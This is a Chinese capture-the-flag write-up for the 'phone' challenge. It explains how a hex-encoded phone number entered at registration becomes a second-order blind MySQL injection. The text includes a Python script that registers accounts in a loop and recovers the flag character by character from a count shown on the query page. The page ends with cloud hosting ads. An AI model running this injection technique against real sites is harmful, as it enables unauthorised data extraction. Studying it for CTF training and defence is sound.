標籤:def sql 技術分享 post range str style head fir
註冊後,即可點擊查看誰的電話和我類似。
註冊時有三個必填項,分別是使用者名稱、密碼和電話。電話要求必須數字。
註冊個1111的電話後,點擊查看,返回有1個人電話和我類似,在註冊一個為1111的,返回有2人電話和我類似。 說明連資料庫查詢了,而且只返回數字。
盲注的思路,註冊時電話填寫十六進位。
於是python如下:
#coding=utf-8import requestsimport binasciiimport redef login_sqli(url,username,password,payload): url = url username = username password = password headers = { ‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0‘ } # login data = {‘username‘:username, ‘password‘:password, ‘phone‘:payload, ‘register‘:‘Login‘ } try: #get_session s = requests.session() req1 = s.get(url+‘/index.php‘) #register req2 = s.post(url+‘/register.php‘,data = data) #sqli req3 = s.get(url+‘/query.php‘) return req3.text except: print ‘Error‘ if __name__ == ‘__main__‘: login_url = ‘http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com‘ password = ‘123123‘ result = ‘‘ pattern = re.compile(r‘\d?\d?\d?\d?\d?\d‘) for i in range(1,43): for j in range(33,128): payload = "5555%%‘ and ord(mid((select * from flag),%d,1))=%d #" %(i,j) payload_0x = binascii.b2a_hex(payload) _payload = ‘0x‘+payload_0x username = ‘userrif‘+str(i)+str(j) text = login_sqli(login_url,username,password,_payload) #time.sleep(3) r = re.search(pattern,text) if(int(r.group()) > 0): print str(i)+‘-->‘+chr(j) else: continue
結果:
網鼎杯題目“phone”--十六進位mysql注入
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
